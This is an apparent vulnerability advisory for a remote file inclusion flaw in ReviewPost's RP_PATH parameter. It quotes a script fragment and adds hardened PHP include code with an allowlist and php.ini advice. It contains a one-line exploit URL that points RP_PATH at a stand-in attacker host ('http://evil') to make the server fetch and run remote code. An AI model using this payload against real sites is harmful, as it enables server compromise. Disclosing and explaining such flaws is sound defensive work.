Input passed to ReviewPost's "RP_PATH" parameter is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources (remote file inclusion).
<?php
// Fragment quoted from the affected script; diewell() and $Globals are defined
// elsewhere in ReviewPost (not shown). Note that this check only guards against a
// leftover install.php; it does not validate RP_PATH before it reaches include().
if ( file_exists("install.php") || file_exists("{$Globals['maindir']}/install.php") ) {
    diewell( "For security reasons, please remove the install.php from the ReviewPost directory before proceeding." );
    exit;
}
?>
Exploit:
The following URL triggers the vulnerability by pointing RP_PATH at an attacker-controlled host: http://somehost/path_to_ReviewPost/index.php?RP_PATH=http://evil
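The include pattern behind this class of bug, next to a hardened version, as an added example that is not ReviewPost's code; the `rp_safe_include_dir()` helper, the `$allowed_dirs` allowlist and the `lib` subdirectory layout are assumptions.

```php
<?php
// Added example, not ReviewPost's code. It contrasts the include pattern the
// advisory describes with a hardened version. rp_safe_include_dir() and the
// $allowed_dirs allowlist are assumptions used for illustration.

// Vulnerable pattern (kept as a comment so this file never runs it): a value the
// client can supply through the request becomes the prefix of an include. With
// allow_url_fopen/allow_url_include enabled, "http://evil" makes PHP fetch and
// execute remote code; "../" prefixes pull in arbitrary local files.
//
//   include("{$RP_PATH}/functions.php");

// Hardened: never derive the include directory from the request. Default to the
// script's own location and, if a choice is genuinely needed, map a short key to
// an allowlisted subdirectory instead of accepting a path or URL.
function rp_safe_include_dir(string $base_dir, ?string $requested, array $allowed_dirs): ?string
{
    $base = realpath($base_dir);
    if ($base === false) {
        return null;
    }
    if ($requested === null || $requested === '') {
        return $base; // default: the application directory itself
    }
    // The request may only name an allowlisted key, never a path or URL.
    if (!array_key_exists($requested, $allowed_dirs)) {
        return null;
    }
    $dir = realpath($base . DIRECTORY_SEPARATOR . $allowed_dirs[$requested]);
    // realpath() collapses "../", so a prefix check proves the directory is
    // still inside $base even if the allowlist is later edited carelessly.
    if ($dir === false || strncmp($dir, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $dir;
}

$allowed_dirs = ['default' => 'lib', 'legacy' => 'lib/old']; // assumed layout
$RP_PATH = rp_safe_include_dir(__DIR__, $_GET['RP_PATH'] ?? null, $allowed_dirs);
if ($RP_PATH === null) {
    http_response_code(400);
    exit('Invalid RP_PATH');
}
require "{$RP_PATH}/functions.php";
```

As defense in depth, setting `allow_url_include = Off` in php.ini stops include() from fetching remote code even if another parameter is later mishandled.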